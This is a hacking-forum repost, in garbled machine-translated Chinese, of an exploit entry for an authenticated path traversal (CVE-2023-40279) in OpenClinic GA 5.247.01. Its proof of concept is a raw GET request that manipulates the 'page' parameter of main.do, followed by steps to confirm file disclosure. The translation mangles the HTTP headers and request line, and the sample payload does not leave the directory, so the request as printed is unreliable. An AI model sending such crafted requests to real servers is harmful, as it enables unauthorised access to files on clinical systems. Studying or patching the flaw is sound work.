H

Openclinic GA 5.247.01-路径遍历(认证)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: OpenClinic GA 5.247.01-路径遍历(认证)
#日期: 2023-08-14
#利用作者: V. B.
#供应商HomePage3360 https://sourceforge.net/projects/open-clinic/
#软件link: https://sourceforge.net/projects/open-clinic/
#版本: Openclinic GA 5.247.01
#测试在: Windows 10,Windows 11
#CVE: CVE-2023-40279
# 细节
在OpenClinic GA版本5.247.01中发现了一个问题,攻击者可以通过“ get request”到“ main.do”中的“页面”参数执行目录路径遍历。此漏洞允许从任意目录中检索和执行文件。
#概念证明(POC)
复制步骤:
  • 制作恶意获取请求:
  • 使用网络浏览器或能够发送自定义HTTP请求的工具,例如Curl或Burp Suite。
  • 格式为get请求如下(在此示例中,././main.jsp用于尝试目录遍历以访问main.jsp):
get/openclinic/main.do?page=././main.jsp http/1.1
HOST: 192.168.100.5:10088
Accept-incoding: Gzip,放气
ACCEPT: /
Accept-Language: en-us; q=0.9,en; q=0.8
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/103.0.5060.134 Safari/537.36
连接:关闭
cookie: jsessionid=[会话ID]
cache-control: max-age=0
2。确认漏洞:
  • 将精心设计的GET请求发送到目标服务器。
  • 如果服务器使用所请求的文件的内容(例如,main.jsp)从预期目录外部响应,则确认目录路径遍布漏洞的存在。
  • 这种脆弱性会导致敏感信息披露或更严重的攻击。
 
后退
顶部